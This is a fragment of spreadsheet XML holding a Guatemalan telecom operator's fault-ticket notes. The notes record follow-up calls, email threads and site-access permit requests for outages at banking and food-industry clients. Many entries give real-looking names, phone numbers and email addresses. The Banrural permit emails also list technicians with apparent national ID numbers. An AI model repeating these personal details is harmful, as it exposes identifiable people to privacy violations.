CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE PRUEBAS IP2042023 || BANCO AGRICOLA S.A
*-*-*-*-</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 22109500 MENCIONA QUE NO HA RECIBIDO EL CORREO
-ID 3001191336</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  TANIA CERON 22109500 CONTESTA EL SEÑOR SANTIAGO BONILLA  QUIEN INDICA QUE YA ESTARAN REVISANDO Y RESPONDIENDO EL CORREO**
-ID 3001155261
**</t>
  </si>
  <si>
    <t>SE ENVÍA CORREO A CLIENTE, SOLICITANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL DE CABLE QUE SE ENCUENTRA EN SITIO
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 30 DE JUNIO DE 2022 14:00
PARA: JONATHAN EDUARDO TEZEN MEJIA &lt;JONATHAN.TEZENM@CLARO.COM.GT&gt;; JOSE ARTURO CORADO JIMENEZ &lt;JOSE.CORADO@CLARO.COM.GT&gt;; RODRIGUEZ CRISTOBAL, MIGUEL ANGEL &lt;MIGUELAN.RODRIGUEZ@CLARO.COM.GT&gt;; MESA DE SERVICIO &lt;MESADESERVICIO@BANCOAGRICOLA.COM.SV&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE PRUEBAS IP2042023 || BANCO AGRICOLA S.A
BUENA TARDE ESTIMADO CLIENTE, UN GUSTO SALUDARLE.
CON RESPECTO AL SERVICIO REPORTADO, SOLICITAMOS DE SU APOYO GESTIONANDO LOS PERMISOS DE LOS TÉCNICOS DE FIBRA QUE SE PRESENTA EN SITIO.
DIRECCIÓN:   SOLICITUD DE PRUEBAS IP2042023 || BANCO AGRICOLA S.A
ADJUNTAMOS LOS DATOS DE LOS TÉCNICOS
CODIGO NOMBRE DE EMPLEADO TELEFONO
10799 ERICK JOSUE MARTINEZ REYES
11284 CHARLES ANTHONY GALLEGOS MENDEZ
12119 OSCAR ANTONIO REQUENO RAMOS
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>SE ADJUNTA A LA COLA DE CORREO ,
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 6 DE JULIO DE 2022 11:00
PARA: CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;; ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; JONATHAN EDUARDO TEZEN MEJIA &lt;JONATHAN.TEZENM@CLARO.COM.GT&gt;; JOSE ARTURO CORADO JIMENEZ &lt;JOSE.CORADO@CLARO.COM.GT&gt;; RODRIGUEZ CRISTOBAL, MIGUEL ANGEL &lt;MIGUELAN.RODRIGUEZ@CLARO.COM.GT&gt;; MESA DE SERVICIO &lt;MESADESERVICIO@BANCOAGRICOLA.COM.SV&gt;; FRANCISCO REYES MIRANDA ESCOBAR &lt;FMIRANDA@BANCOAGRICOLA.COM.SV&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE PRUEBAS IP2042023 || BANCO AGRICOLA S.A
BUEN DÍA ESTIMADO CLIENTE,  UN GUSTO SALUDARLE.
SE ADJUNTA A LA COLA DE CORREOS PARA QUE NOS PUEDAN APOYAR CON LO SIGUIENTE
SOLICITAMOS DE SU APOYO CONFIRMANDO LA FECHA QUE SERÁ LA INDUCCIÓN QUE DARÁ LA EMPRESA CAJA Y BOLSAS, PARA NUESTRO PERSONAL TÉCNICO EN CRONOLOGÍA ANTERIOR
ESTAREMOS PENDIENTES DE LA FECHA Y HORA PARA HACERNOS PRESENTES.
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE TANIA CERON 22109500 MENCIONA QUE ESTARA NOTIFICANDO PARA QUE LE DEN SEGUIMIENTO
-ID 3001853156</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SRTA. TANIA CERON 22109500 CONTESTA MESA DE SERVICIO, SOLICITAN QUE SE ENVIE CORREO PARA APOYAR CON LAS PRUEBAS DE PRIMER NIVEL.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE SOLICITANDO DESCARTES DE PRIMER NIVEL, A LA ESPERA DE RESPUESTA DE CLIENTE,
ASUNTO: SOLICITUD DE PRUEBAS IP2042023 || BANCO AGRICOLA S.A</t>
  </si>
  <si>
    <t>F4619108</t>
  </si>
  <si>
    <t>SE LLAMA CLIENTE  WAILY CASERES 33476709 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001601923</t>
  </si>
  <si>
    <t>F4619117</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS HERNANDEZ AL 77483657 NO RECONOCE LOS HOST NO RECONOCE LA IP NI ANTENA WIFI || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 2001595319
**</t>
  </si>
  <si>
    <t>F4619118</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS AL 34332517 NO RESPONDE SE INTENTARA LUEGO **
-ID 2001599215
**</t>
  </si>
  <si>
    <t>F4619169</t>
  </si>
  <si>
    <t>SE LLAMA AL PR GUILMAR CHILEL AL 54748598 ID 2001689033 ATIENDE Y SE LE BRINDA LA INFORMACIÓN EN SEGUIMIENTO DEL TICKET Y COMENTA QUE NO SABE QUE GESTIÓN REALIZAR YA QUE AL PARECER ESTA POR LA REDUNDANTE  SIN EMBARGO SE LE LLAMA AL CLIENTE ANGEL RAMOS AL 54748598 ID 2001689033  PERO INGRESA A BUZÓN DE VOZ PARA CONFIRMAR LO INDICADO POR EL GESTOR A CARGO, COMO EL CLIENTE TIENE EL SERVICIO OPERATIVO, SE PROCEDE AL CIERRE DE LA FALLA PENDIENTES CONFIRMAR EL CIERRE DE LA SD CON EL CLIENTE. SE NOTIFICA AL GESTOR JAIMEJ.HERNANDEZ VÍA SKYPE</t>
  </si>
  <si>
    <t>F4619189</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MACHON JUAN CARLOS-77407781  3 VECES##NO CONTESTA- ENVIA DIRECTO A BUZON ##SE TRATA DE LLAMAR PARA CONFIRMAR VISITA</t>
  </si>
  <si>
    <t>F4619201</t>
  </si>
  <si>
    <t>SE LLAMA AL PR FERNANDO GONZALES AL 42503906 ID 2001659679 ATIENDE Y SE LE BRINDA LA INFORMACIÓN EN SEGUIMIENTO DEL TICKET Y COMENTA QUE AUN PERSISTE LA AFECTACIÓN Y SOLO COMENTA QUE DESEA EL PROCESO A SEGUIR, SE CONTACTA CON EL GESTOR A CARGO ESVIN.PAREDES AL 8124 ID 2001662456 NO RESPONDEN SE ESCALA CON JUAN MANUEL CARDONA  AL 41287321 ID 2001663333 SE LE COMENTA Y BRINDA EL NUMERO DE CONTACTO 24206235 ID 2001663544 SE LLAMA Y NO RESPONDEN SE CONTACTA NUEVAMENTE CON JUAN MANUEL AL 41287321  ID 2001664174 Y HACE LA CONFERENCIA CON EL GESTOR Y SE LE DEJA CON EL CLIENTE EN LINEA</t>
  </si>
  <si>
    <t>SE HACE UNA LLAMADA CON EL CLIENTE FERNANDO GONZALES  HACIA NUMERO CLARO Y POR 10 MINUTOS FUNCIONA CON NORMALIDAD,  PERO PARA LOS DE TIGO A LAS 5 MINUTOS SE PIERDE EL AUDIO. CLIENTE SACARÁ LISTADO DE LOS NUMEROS A LOS CUALES ESTA TENIENDO PROBLEMA Y LOS ENVIARÁ MAÑANA 28/06 PARA QUE SE VALIDE SI TODOS LOS NUMEROS QUE LE GENERAN ESTE EVENTO SON DE TIGO.   DE SER NECESARIO SE HARA VISITA TECNICA EN HORARIO DE LAS 18 HORAS.
2001614649
COLA:
NOMBRE: A: 42503906
NÚMERO: 42503906
DURACIÓN: 0:01:50
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 42503906
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 27/06/2022 18:05:40</t>
  </si>
  <si>
    <t>F4619204</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDGAR DIAZ 32120149 MENCIONA QUE LO QUE NECESITA ES EL CAMBIO DEL EQUIPO, SE LE MENCIONA QUE A NIVEL DE CLARO EL SERVICIO ESTA FUNCIONANDO CORRECTAMENTE
SI REQUIERE REALIZAR UN CAMBIO CON LOS EQUIPOS ES DIRECTAMENTE CON EL EJECUTIVO
-ID 2001603577</t>
  </si>
  <si>
    <t>F4619212</t>
  </si>
  <si>
    <t>SE ENVÍA CORREO A CLIENTE, SOLICITANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SIRIO
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: MARTES, 28 DE JUNIO DE 2022 12:27
PARA: TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE PERMISOS | 8902411T | BANCO DE DESARROLLO RURAL, S.A.
BUENA TARDE ESTIMADO CLIENTE UN GUSTO SALUDARLE.
CON RESPECTO AL SERVICIO REPORTADO, SOLICITAMOS DE SU APOYO GESTIONANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO.
DIRECCIÓN:   REDUNDANCIA.- 2A. CALLE 1-30, ZONA 1 FRENTE AL PARQUE CENTRAL DE SAN FRANCISCO ZAPOTITLAN, SUC
ADJUNTAMOS LOS DATOS DE LOS TÉCNICOS
PEDROZA MARTINEZ, NERY ALBERTO	699416	1908740660506
SAGATUME AGUILAR, ANNDY FABRISCIO	720005	1960391771001
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE Y SE AGREGA A CLIENTE ANIBAL GONZALEZ
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 28 DE JUNIO DE 2022 11:34
PARA: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;; TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;; ANIBAL.GONZALEZ@BANRURAL.COM.GT &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE PERMISOS | 8902411T | BANCO DE DESARROLLO RURAL, S.A.
*-*-*-*-*-</t>
  </si>
  <si>
    <t>SE VALIDA QUE NO TIENE SEGUIMIENTO, SE CONTACTA CON JOCABED ALONZO AL 55550340 ID  2001696129 EN EL CUAL COMENTA QUE AUN PERSISTE SE TRANSFIERE LA LLAMADA CON EL GESTOR JURGEN AL 8126 ID 2001697056 INGRESA LA LLAMADA CON MIGUE IXOCT LA DESVÍA  A MIGUEL RODRIGEZ ATIENDE MIGUEL Y COMENTA QUE LO TIENE QUE VALIDAR JURGEN Y VA A TRANSFERIR CON EL GESTOR PERO INDICA QUE LE APOYORA Y SE TRANSFIERE CON EL GESTOR.</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE CLIENTE SRTA. JOCABED ALONZO AL 55550340 INFORMA QUE LOS EQUIPOS ESTAN ENCENDIDOS, APLICARON REINICIO EN VARIAS OCASIONES PERO ENLACE NO LEVANTA. COMENTA QUE PERSONAL TECNICO LE VISITO PERO DEJARON DESCONECTADO UN CABLE QUE NO SABE HACIA DONDE VA.</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL PERO NO RESPONDEN, SE INTENARA LUEGO
-ID 2001716834</t>
  </si>
  <si>
    <t>F4619213</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE JASMIN SARMIENTO. QUIEN INDICA QUE VA A REINCIAR LA PBX. SOLICITA LLAMADA EN 20MIN.
2001609687, 2001610090.
COLA:
NOMBRE: A: 0050370708152
NÚMERO: 0050370708152
DURACIÓN: 0:00:42
ESTADO: CONECTADA
DETALLES: 0050370708152
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 27/06/2022 17:40:39</t>
  </si>
  <si>
    <t>F4619229</t>
  </si>
  <si>
    <t>SE HABLÓ CON ÁNGEL RODRÍGUEZ/CLIENTE 25069510 INDICA ENLACE OK, PIDE MONITOREO PARA LAS 22:00 HORAS DE HOY.</t>
  </si>
  <si>
    <t>F4619233</t>
  </si>
  <si>
    <t>SE HABAL CON CLIENTE ## INDICA QUE EL PJROBLEMA QUE ESTAN PRESENTANDO ES QUE TIENEN QUE REINICIAR SU MEDIAGATEWAY + QUE EMPIEZAN A TENER PROBLEMAS DE MILISEGUNDOS CON AUDIO, CONFIRMA QUE SI SE ESTA ENTRENGADO LA LLAMADA + QUE VERIFICARAN A NIVEL INTERNO## SE PROCEDE AL CIERRE## A NIVEL DE CLARO TODO OK## CLIENTE VALIDA  DIEGO UREÑA.  0050625828400 || 0050625825812 ##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA AL PR DIEGO MORA AL 22437253 ID 2001704902 ATIENDE JEFERSON ARCE Y SE LE EXPLICA Y COMENTA QUE SE LE ENVIÉ CORREO CON LOS DATOS, PERO ESTE DATO YA LOS TIENE Y COMENTA QUE ES OTRA ÁREA POR TAL RAZÓN NO HAY UN RESOLUCIÓN DE SU LADO, POR LO QUE SE CONSULTA CON LA OTRA PERSONA QUE APARECE EN LOS REGISTROS DE CONTACTO CON DIEGO UREÑA +506 25825812 ID 2001705075  Y COMENTA QUE PRESENTA AUN LA AFECTACIÓN EN LOS NÚMEROS 44041100 / 44040630, HIZO PRUEBAS EN LA MAÑANA Y AUN CONTINUABA, SE TRANSFIERE CON ACCESOS AL 8124 CON EL GESTOR MARIAI.GODINEZ  ID 2001707064 PERO ATIENDE ULIL COJTI Y TRANSFIERE CON MARIA GODINEZ Y SE DEJA EN LINEA CON EL CLIENTE.</t>
  </si>
  <si>
    <t>DIEGO MORA-22437253 ## SE TIENE EN LINEA ##VIVO</t>
  </si>
  <si>
    <t>SE TIENE A CLIENTE EN LINEA ## DIEGO URENA ## 0050625828400</t>
  </si>
  <si>
    <t>SE HABAL CON CLIENTE ## INDICA QUE FUE EL QUE APERTURO EL CASO + COMENTA QUE DESCONOCE SOBRE EL REPORTE PERO, QUE LO QUE LE ESCALARON FUE QUE EN PUNTO REMOTO, DEBEN DE REINICIAR UN EQUIPO Y SERVICIO RESTABELCE- ## SE DEBE COMPROBAR EL REPORTE CON PERSONAL EN PR, POR LO QUE CLIENTE ESTA ESCALANDO CON LA PERSONA QUE LE ESCALO + SE LE BRINDA EL NUMERO DEL AGENTE + SI NO DEVUELVE LLAMADA, SE LE DEVOLVERA EN 30 MINUTOS ##VIVO</t>
  </si>
  <si>
    <t>CLIETNE INDICA QUE EL PROBLEMA QUE REPORTA ES QUE UN EQUIPO SE QUEDA INHIBIDO ## CLIENTE NO SABE QUE EQUIPO ES AL QUE LE APLICAN RESET- PEDIRA INFORMACION + COMENTA QUE SE DE SEGUIMIENTO MAÑANA 9AM##
NUMEROS AL CUAL SE PUEDE LOCALIZAR: DIEGO UREÑA.  0050625828400 || 0050625825812</t>
  </si>
  <si>
    <t xml:space="preserve"> SE LLAMA ACLIENTE DIEGO UREÑA.  0050625828400 || 0050625825812 ##ENVIA A BUZON##SE INTENTARA LUEGO
2001681638
COLA:
NOMBRE: A: 0050625825812
NÚMERO: 0050625825812
DURACIÓN: 0:00:40
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050625825812
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 28/06/2022 10:00:26
2001681859
COLA:
NOMBRE: A: 0050625825812
NÚMERO: 0050625825812
DURACIÓN: 0:00:43
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050625825812
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 28/06/2022 10:00:32</t>
  </si>
  <si>
    <t xml:space="preserve"> SE LLAMA ACLIENTE DIEGO UREÑA.  0050625828400 || 0050625825812
2001681638
COLA:
NOMBRE: A: 0050625825812
NÚMERO: 0050625825812
DURACIÓN: 0:00:12
ESTADO: MARCANDO
DETALLES: 0050625825812
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 28/06/2022 09:58:48</t>
  </si>
  <si>
    <t>F4619237</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS DIEGO MORA AL 22437253 CONTESTA EL SEÑOR STEVEN MARQUEZ INDICA QUE AUN VE PERDIDAS QUE ESTA REALIZANDO PING AL ROUTER DE GUATEMALA CON LA IP 22.48.4.49 || SE NOTIFICA A GESTOR **
-ID 2001665235
**</t>
  </si>
  <si>
    <t>F4619239</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 22437253 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001006789</t>
  </si>
  <si>
    <t>F4619293</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JULIA MARTINEZ 52094547 NO RESPONDE || SE INTENTARA LUEGO **
-ID 2001690927
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JULIA MARTINEZ 52094547 NO RESPONDE || SE INTENTARA LUEGO **
-ID 2001718949
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JULIA MARTINEZ 52094547 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001650902</t>
  </si>
  <si>
    <t>F4619308</t>
  </si>
  <si>
    <t>SE AGREGO A LA COLA DE CORREO AL TEC. MISAEL RIVAS
DE: JOSE ARTURO CORADO JIMENEZ &lt;JOSE.CORADO@CLARO.COM.GT&gt;
ENVIADO: MARTES, 28 DE JUNIO DE 2022 11:57
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; TIC GONZÁLEZ, ANIBAL &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;; ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; AXEL SAMUEL LOPEZ ORTIZ &lt;AXELS.LOPEZ@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE PERSIMOS || BANCO DE DESARROLLO RURAL, S.A. || AGE 32 || F4619308
BUENA TARDE ESTIMADO CLIENTE,
   ES UN GUSTO SALUDARLE, EL PRESENTE ES PARA SOLICITAR DE SU AMABLE APOYO CON GESTIONAR ACCESOS A NUESTRA ÁREA TÉCNICA PARA VERIFICAR SERVICIO,
8901757T||REDUNDANCIA WIMAX.- AGE.32.- 5 CALLE Y 7 AVENIDA ESQUINA ZONA 1 HUEHUETENANGO || BANCO DE DESARROLLO RURAL, S.A.
DATOS DE LOS TECNICOS
MARIO OTONIEL TARACENA RIOS 1683479461301
NOE MISAEL RIVAS RIVAS 2353403081301
QUEDAMOS A LA ESPERA DE SUS COMENTARIOS</t>
  </si>
  <si>
    <t>SE ENVIA CORREO PARA GESTIONAR LOS PERMISOS DE PERSONAL TECNICO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 28 DE JUNIO DE 2022 11:09
PARA: ANIBAL.GONZALEZ@BANRURAL.COM.GT &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; AXEL SAMUEL LOPEZ ORTIZ &lt;AXELS.LOPEZ@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE PERSIMOS || BANCO DE DESARROLLO RURAL, S.A. || AGE 32 || F4619308
BUEN DÍA
SOLICITAMOS PUEDA GESTIONARSE EL ACCESO A PERSONAL TÉCNICO DE CLARO PARA EL INGRESO A SUS INSTALACIONES PARA REALIZAR LAS REPARACIONES NECESARIAS.
MARIO OTONIEL TARACENA RIOS 16834794613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EDIN MORALES - 52094734 RESPONDE YESENIA, SE LE EXPLICA EL INVONVENIENTE
CLIENTE VALIDA CON EL GERENTE Y MENCIONA QUE NO QUIERE HACER PRUEBAS PORQUE NUNCA HAN ENVIADO A UN TECNICO
CLIENTE  NO APOYA EN REALIZAR PRUEBAS
-ID 2001651601
NOMBRE DEL CLIENTE: BANCO DE DESARROLLO RURAL, S.A.
UBICACIÓN:5 CALLE Y 7 AVENIDA ESQUINA ZONA 1 HUEHUETENANGO
CONTACTO EN SITIO: YESENIA LOPEZ - 52094734
HORARIO DE ATENCION: 8:30 - 17:30
GESTIÓN DE PERMISOS: DATOS DE PERSONAL TECNICO A LA CENTRAL</t>
  </si>
  <si>
    <t>F4619318</t>
  </si>
  <si>
    <t>SE LLAMA AL PR LIDIA PEREZ AL 25041501 ID 2001645959 ATIENDE JENNY Y SE LE BRINDA LA INFORMACIÓN EN SEGUIMIENTO DEL TICKET Y COMENTA QUE EL SERVICIO SI ESTABA CAÍDO PERO FUE EL DÍA DE AYER, SE CONSULTA SI PUEDE AUTORIZARNOS EL CIERRE Y SE CONTACTA CON LIDIA PEREZ Y COMENTA QUE EN EFECTO SE PUEDE PROCEDER CON EL CIERRE DEL TICKET. SE NOTIFICA AL GESTOR DARWINH.ESPANA VÍA SKYPE PARA EL CIERRE.</t>
  </si>
  <si>
    <t>F4619320</t>
  </si>
  <si>
    <t>###SE MANDA CORRREO AL CLIENTE PARA GESTIONAR PERMISOS##
DE: VELDIN JANITZIO PALENCIA FLORES
ENVIADO: MARTES, 28 DE JUNIO DE 2022 9:07
PARA: TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;; TIC-TELE-TEC@BANRURAL.COM.GT &lt;TIC-TELE-TEC@BANRURAL.COM.GT&gt;; TIC-CALLCENTER@BANRURAL.COM.G &lt;TIC-CALLCENTER@BANRURAL.COM.G&gt;; TIC-CALLCENTER@BANRURAL.COM.GT &lt;TIC-CALLCENTER@BANRURAL.COM.GT&gt;; TIC GONZÁLEZ, ANIBAL &lt;ANIBAL.GONZALEZ@BANRURAL.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: GESTIÓN DE PERMISOS | 8901424T |BANCO DE DESARROLLO RURAL, S.A. |REDUNDANCIA WIMAX.- AVENIDA SIMON BOLIVAR MORALES IZABAL
BUEN DÍA ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO 8901424T |BANCO DE DESARROLLO RURAL, S.A. |REDUNDANCIA WIMAX.- AVENIDA SIMON BOLIVAR MORALES IZABAL
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO INDICANDO LA HORA Y DÍA DE VISITA.
TECNICO:
LESTER GIOVANY ORELLANA SANCHEZ 1787353451801
QUEDAMOS ATENTOS A SUS COMENTARIOS
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>F4619330</t>
  </si>
  <si>
    <t>27/06/2022 21:18:21 GUATEMALA/CENTRO AMERICA (VICTOR IBOY SAGUAY):
NOC REGIONAL
SEGUIMIENTO FALLA: F4619273
FECHA DE INICIO: 27/06/2022 18:28:00
PAÍS: HONDURAS
EVENTO: AFECTACIÓN DE EQUIPOS EN EL CORREDOR DE CHAGUITILLO HN - REGIÓN SUR ORIENTE
SEGUIMIENTO: INFORMA PLEX: DAÑO POR INCENDIO EN POSTE DE LA ENEE EN JUTICALPA, EN ESTOS MOMENTOS PERSONAL ESTÁ EVALUANDO DAÑO PARA INSTALAR JUMPER DE FO.
AFECTACIÓN: 34 SITIOS DE CELDA
DURACIÓN: 02:46:10</t>
  </si>
  <si>
    <t>F4619332</t>
  </si>
  <si>
    <t>*/*/*/CLIENTE DESEA QUE SE LE ENVÍEN LAS VALIDACIONES QUE SE REALIZARON CON LAS IPS QUE ENVÍARON EN CORREO ANTERIOR*/*/*
DE: KANDY KRYSTINA CORONADO RAMON
ENVIADO EL: MARTES, 28 DE JUNIO DE 2022 09:19
PARA: JUAN ELIAS SIERRA ORTIZ &lt;JUAN.SIERRA@SOMOSCMI.COM&gt;; ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; NELSON GERARDO YUTAN CHARUC &lt;NELSON.YUTAN@SOMOSCMI.COM&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; JOSE MANUEL OCHOA URBINA &lt;JOSEM.OCHOA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CMIA_REDES &lt;CMIA_REDES@SOMOSCMI.COM&gt;; MANUEL GREGORIO COLMENARES AVILA &lt;MANUEL.COLMENARES@SOMOSCMI.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: FALLA ENLACE_CLARO XT_DISTRI-MAZATENANGO_SECUNDARIO _ DISTRIBUIDORA MAZATENANGO
BUENOS DÍAS JUAN ELÍAS,
            DANDO SEGUIMIENTO A SU CASO, HEMOS TRASLADADO LA INFORMACIÓN AL ÁREA CORRESPONDIENTE PARA PROCEDER A BRINDARLE LA INFORMACIÓN SOLICITADA, QUEDAMOS A LA ESPERA DE LOS COMENTARIOS DE CNOC CA.
CUALQUIER CONSULTA ESTAMOS A LA ORDEN.
--------------------------
DE: JUAN ELIAS SIERRA ORTIZ [MAILTO:JUAN.SIERRA@SOMOSCMI.COM]
ENVIADO EL: MARTES, 28 DE JUNIO DE 2022 09:00
PARA: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; NELSON GERARDO YUTAN CHARUC &lt;NELSON.YUTAN@SOMOSCMI.COM&gt;; KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; JOSE MANUEL OCHOA URBINA &lt;JOSEM.OCHOA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CMIA_REDES &lt;CMIA_REDES@SOMOSCMI.COM&gt;; MANUEL GREGORIO COLMENARES AVILA &lt;MANUEL.COLMENARES@SOMOSCMI.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: FALLA ENLACE_CLARO XT_DISTRI-MAZATENANGO_SECUNDARIO _ DISTRIBUIDORA MAZATENANGO
BUEN DIA,
EN EL CORREO QUE ENVIO NELSON HAY DIRECCIONES IP, REALIZARON PRUEBAS CON ESAS? NOS PUEDEN COMPARTIR IGUAL, LAS VALIDACIONES QUE HAN REALIZADO.
SALUDOS.</t>
  </si>
  <si>
    <t>COORDINADA LA VISITA TÉCNICA PARA MAÑANA EN HORARIO DE 13:00 A 15:00 HORAS A SOLICITUD DE CLIENTE.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SELVYN CHAY 47700119 PARA SOLICITAR DATOS DE VISITA
CLIENTE MENCIONA QUE SI SE VA VER AFECTADO EL SERVICIO LA VISITA PUEDE SER DE 13:00 - 15:00
 SI NO SE VA VER AFECTADO DE 13:00 -  17:00
-ID 3001019524
NOMBRE DEL CLIENTE: CMI - SISTEMAS Y EQUIPOS
UBICACIÓN:KM 163.5 CARRETERA A CUYOTENANGO 00-00 ZONA 0, MAZATENANGO
CONTACTO EN SITIO: SELVYN CHAY - 47700119
